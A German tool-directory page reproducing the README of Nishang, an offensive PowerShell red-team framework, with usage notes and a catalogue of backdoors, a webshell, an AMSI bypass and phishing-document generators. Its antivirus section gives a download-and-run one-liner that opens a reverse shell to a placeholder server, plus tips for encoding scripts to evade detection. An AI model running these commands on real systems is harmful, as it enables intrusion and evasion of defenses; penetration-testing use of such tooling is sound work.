Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
nishang — Nishang - Offensives PowerShell für Red Team, Penetrationstests und offensive Sicherheit. | Kitploit
Tools/GitHubGitHub/samratashok/nishang
Passwort-CrackingPhishing-ToolsPrivilege EscalationPayload-GenerierungExploitationLaterale BewegungDatenexfiltrationInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlRed Teaming
10.0k2.5k128vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHubsamratashok/nishang

nishang

Nishang - Offensives PowerShell für Red Team, Penetrationstests und offensive Sicherheit.

Repository anzeigen

Nishang

Nishang ist ein Framework und eine Sammlung von Skripten und Payloads, die die Nutzung von PowerShell für offensive Sicherheit, Penetrationstests und Red Teaming ermöglicht. Nishang ist in allen Phasen von Penetrationstests nützlich.

Von Nikhil Mittal Gründer von Altered Security - Praxisorientiertes Red Team und Enterprise-Sicherheitstraining!

Verwendung

Importieren Sie alle Skripte in die aktuelle PowerShell-Sitzung (PowerShell v3 und höher).

PS C:\nishang> Import-Module .\nishang.psm1

Verwenden Sie die einzelnen Skripte mit Dot-Sourcing.

PS C:\nishang> . C:\nishang\Gather\Get-Information.ps1

PS C:\nishang> Get-Information

Um Hilfe zu einem Skript oder einer Funktion zu erhalten, verwenden Sie:

PS C:\nishang> Get-Help [scriptname] -full

Beachten Sie, dass die Hilfe ab Version 0.3.8 für die nach dem Ausführen des Skripts geladene Funktion und nicht für das Skript selbst verfügbar ist. In allen Fällen ist der Funktionsname identisch mit dem Skriptnamen.

Um beispielsweise die Hilfe zu Get-WLAN-Keys.ps1 anzuzeigen, verwenden Sie

PS C:\nishang> . C:\nishang\Get-WLAN-Keys.ps1

PS C:\nishang> Get-Help Get-WLAN-Keys -Full

Antivirus

Nishang-Skripte werden von vielen Antivirenprogrammen als bösartig eingestuft. Die Skripte auf einem Ziel sollen im Arbeitsspeicher verwendet werden, was mit PowerShell sehr einfach ist. Zwei grundlegende Methoden zur Ausführung von PowerShell-Skripten im Arbeitsspeicher:

Methode 1. Verwenden Sie den In-Memory-Download und die Ausführung: Verwenden Sie den folgenden Befehl, um ein PowerShell-Skript von einer Remote-Shell, einer Meterpreter-Native-Shell, einer Webshell usw. auszuführen, sowie die von ihm exportierte Funktion. Alle Skripte in Nishang exportieren eine Funktion mit demselben Namen in der aktuellen PowerShell-Sitzung.

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Methode 2. Verwenden Sie den Parameter -encodedcommand (oder -e) von PowerShell Alle Skripte in Nishang exportieren eine Funktion mit demselben Namen in der aktuellen PowerShell-Sitzung. Stellen Sie daher sicher, dass der Funktionsaufruf im Skript selbst erfolgt, wenn Sie den Parameter encodedcommand von einer Nicht-PowerShell-Shell aus verwenden. Fügen Sie für obiges Beispiel einen Funktionsaufruf (ohne Anführungszeichen) "Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]" hinzu.

Kodieren Sie das Skript mit Invoke-Encode aus Nishang:

PS C:\nishang> . \nishang\Utility\Invoke-Encode

PS C:\nishang> Invoke-Encode -DataToEncode C:\nishang\Shells\Invoke-PowerShellTcp.ps1 -OutCommand

Kodierte Daten geschrieben nach .\encoded.txt

Kodierter Befehl geschrieben nach .\encodedcommand.txt

Verwenden Sie von oben das kodierte Skript aus encodedcommand.txt und führen Sie es auf einem Ziel aus, auf dem Befehle ausgeführt werden können (eine Remote-Shell, eine Meterpreter-Native-Shell, eine Webshell usw.). Verwenden Sie es wie folgt:

C:\Users\target> powershell -e [encodedscript]

Falls die Skripte trotzdem erkannt werden, hilft es, die Funktions- und Parameternamen zu ändern und den Hilfetext zu entfernen.

Falls AMSI von Windows 10 die Skriptausführung weiterhin blockiert, siehe diesen Blog: http://www.labofapenetrationtester.com/2016/09/amsi.html

Skripte

Nishang enthält derzeit die folgenden Skripte und Payloads.

ActiveDirectory

Set-DCShadowPermissions

Ändert AD-Objekte, um minimale Berechtigungen für DCShadow bereitzustellen.

Antak - die Webshell

Antak

Führen Sie PowerShell-Skripte im Arbeitsspeicher aus, führen Sie Befehle aus und laden Sie Dateien mit dieser Webshell hoch und herunter.

Backdoors

HTTP-Backdoor

Ein Hintertürchen, das Anweisungen von Drittanbieter-Websites empfangen und PowerShell-Skripte im Arbeitsspeicher ausführen kann.

DNS_TXT_Pwnage

Ein Hintertürchen, das Befehle und PowerShell-Skripte aus DNS-TXT-Abfragen empfangen, auf einem Ziel ausführen und über die Abfragen ferngesteuert werden kann.

Execute-OnTime

Ein Hintertürchen, das PowerShell-Skripte zu einem bestimmten Zeitpunkt auf einem Ziel ausführen kann.

Gupt-Backdoor

Ein Hintertürchen, das Befehle und Skripte von einer WLAN-SSID empfangen kann, ohne sich mit ihr zu verbinden.

Add-ScrnSaveBackdoor

Ein Hintertürchen, das den Windows-Bildschirmschoner für die ferngesteuerte Befehls- und Skriptausführung nutzen kann.

Invoke-ADSBackdoor

Ein Hintertürchen, das alternative Datenströme und die Windows-Registrierung zur Persistenz nutzen kann.

Add-RegBackdoor

Ein Hintertürchen, das den bekannten Debugger-Trick verwendet, um Payloads mit Sticky Keys und Utilman (Windows-Taste + U) auszuführen.

Set-RemoteWMI

Ändert Berechtigungen von DCOM- und WMI-Namespaces, um einem nicht-administrativen Benutzer Zugriff zu gewähren.

Set-RemotePSRemoting

Ändert Berechtigungen der PowerShell-Remoteverwaltung, um einem nicht-administrativen Benutzer Zugriff zu gewähren.

Bypass

Invoke-AmsiBypass

Implementierung öffentlich bekannter Methoden zur Umgehung/Vermeidung von AMSI.

Client

Out-CHM

Erstellt infizierte CHM-Dateien, die PowerShell-Befehle und -Skripte ausführen können.

Out-Word

Erstellt Word-Dateien und infiziert vorhandene, um PowerShell-Befehle und -Skripte auszuführen.

Out-Excel

Erstellt Excel-Dateien und infiziert vorhandene, um PowerShell-Befehle und -Skripte auszuführen.

Out-HTA

Erstellt eine HTA-Datei, die auf einem Webserver bereitgestellt und in Phishing-Kampagnen verwendet werden kann.

Out-Java

Erstellt signierte JAR-Dateien, die mit Applets für Skript- und Befehlsausführung verwendet werden können.

Out-Shortcut

Erstellt Verknüpfungsdateien, die PowerShell-Befehle und -Skripte ausführen können.

Out-WebQuery

Erstellt IQY-Dateien für das Phishing von Anmeldeinformationen und SMB-Hashes.

Out-JS

Erstellt JS-Dateien, die PowerShell-Befehle und -Skripte ausführen können.

Out-SCT

Erstellt SCT-Dateien, die PowerShell-Befehle und -Skripte ausführen können.

Tool herunterladen